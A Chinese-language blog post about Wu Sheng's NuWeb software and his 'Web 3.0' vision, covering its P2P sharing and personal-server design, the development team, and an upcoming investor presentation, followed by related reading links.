至於「NuWeb就是Web 3.0」的部份,大家怎麼看?如果不把它叫Web 3.0的話,或許NuWeb會被視為全球上百套p2p「檔案分享系統」中的其中一套,然後加上類似知名高手獨孤木幹圖王的「收藏系統」,然後又加上個人的網站伺服器,可以將部落格與相簿留在自家電腦,用美美的版型分享出來。而它的「Web 3.0」理想或許也會被質疑,把東西放在自己電腦,不見得就是「自己擁有」了,因為我們用的還是微軟的視窗與IE,Intel的微處理器,NuWeb本身或許也會成為新的獨裁者。這或許是科技時代無法避免的宿命,就和買車一樣,雖然車子是自己的,但我對它一點也不瞭解,只能讓車商與修理廠卻掌控了我車的生死,雖然它是「我的」,但我每隔一段時間就要乖乖付費給修車廠,價錢由他們自己開。或許這是高科技世界必然的現象,而且隨著商人開出愈來愈多千奇百怪的「收費模式」,使用者「擁有」的東西或許都是「看似擁有」(pseudo-ownership)。比較重要的是,在談話中,我可以感受到吳昇老師似乎並不堅持「Web 3.0一定得長得像現在的NuWeb」。在NuWeb的設計上,他採一步一步走,把東西儘量簡化,甚至把商務的部份也往後推,或許Web 3.0這檔事是老師為NuWeb想出的一個行銷話術,但演變到現在,老師著重在Web 3.0身上的程度比NuWeb還多,NuWeb成為吳老師Web 3.0概念的其中一個譬喻,而目前看來,它確實也是最貼切、最實在也最好用的一套Web 3.0軟體(以吳老師所設的Web 3.0定義來看)。
我覺得我被吳老師感動的地方,就是他可以用整個人類文明的角度去看網路,而且把他的理想給實實際際的做了出來,在我們面前展示。如果今天我們是蓋晶圓廠、做太陽能板、搞LED磊晶,動不動就提什麼人類文明可是會被視為在打高砲的,可是「互聯網」這個東西早就不只是商業產品。它之所以這麼有潛力,因為它提供人類「另一條連線(connection)」。社會、文明、地球、人世,主要是由人與人之間的連線所組成,網路僅僅給個不一樣的連線,它其實有潛力為人類每日行為造成巨大的改變。除了提供連線,網路也提供一系列快速簡單的開發平台。蔡倫以他發明的造紙術改變了世界,詹姆士瓦特以他發明的蒸氣引擎改變了世界,但是在互聯網上,每個人、每間公司都有機會當下一個改變世界的發明家。所以,能夠以整個人類文明去思考網路下一步者,也有機會變成下一個大成功的網路創業家。吳老師給了NuWeb一個明確的方向,賦它一個「Web 3.0」的使命。下一步,吳老師也說,NuWeb一定會開放原始碼,在合適的授權架構之下,讓全世界一起往「Web 3.0」努力。
吳老師表示,NuWeb背後的伺服機系統是用Borland C寫的,電腦裡的瀏覽軟體則用VC++和PHP與AJAX(版型呈現)。目前團隊約有十位,除了一位視覺設計、一位企畫之外,剩下都是工程師;辦公室以台北的為主(就在Silicon Crossing附近),另外還有兩位在新竹,幾位在嘉義(中正大學學生),全職兼職皆有,這些員工親切且熱情,儘管NuWeb尚未開放,他們已經自己在上面開了好幾個看起來很精彩的部落格。NuWeb主要是在新典資訊旗下開發,吳老師是這間公司主要的股東。
至於下周的投資法說會,其實要留給吳老師的另一間公司Ookon(念「悟空」)作主角。吳老師表示,NuWeb目前以公益為主,是public interest,還有另一塊他也很有心得的,是在企業應用方面,「企業現在只有Intranet,沒有IntraWeb」。投資企業時,其實在投資創辦人,吳老師是台灣網路界的思想家與實踐家,因此,我覺得這會是一場,很特別且有很意思的投資法說會。
沿伸閱讀:
Tenz西瓜的滋味:吳昇老師的 NuWeb 座談會心得
charlesc:NuWeb - Web 3.0?
小白的窩:NUweb與Web 3.0
沒新聞聯合台:NuWeb私觀點
Bilog II:NUWeb, New Web, Web 3.0?
Bilog II:再探NuWeb
張小P 過生活:NuWeb 現況
無形部落:再談 NuWeb
輔大資工:NUWEB
syshen: NuWeb
Web 3.0/集合瀏覽與資訊分享,中正大學推動NUWeb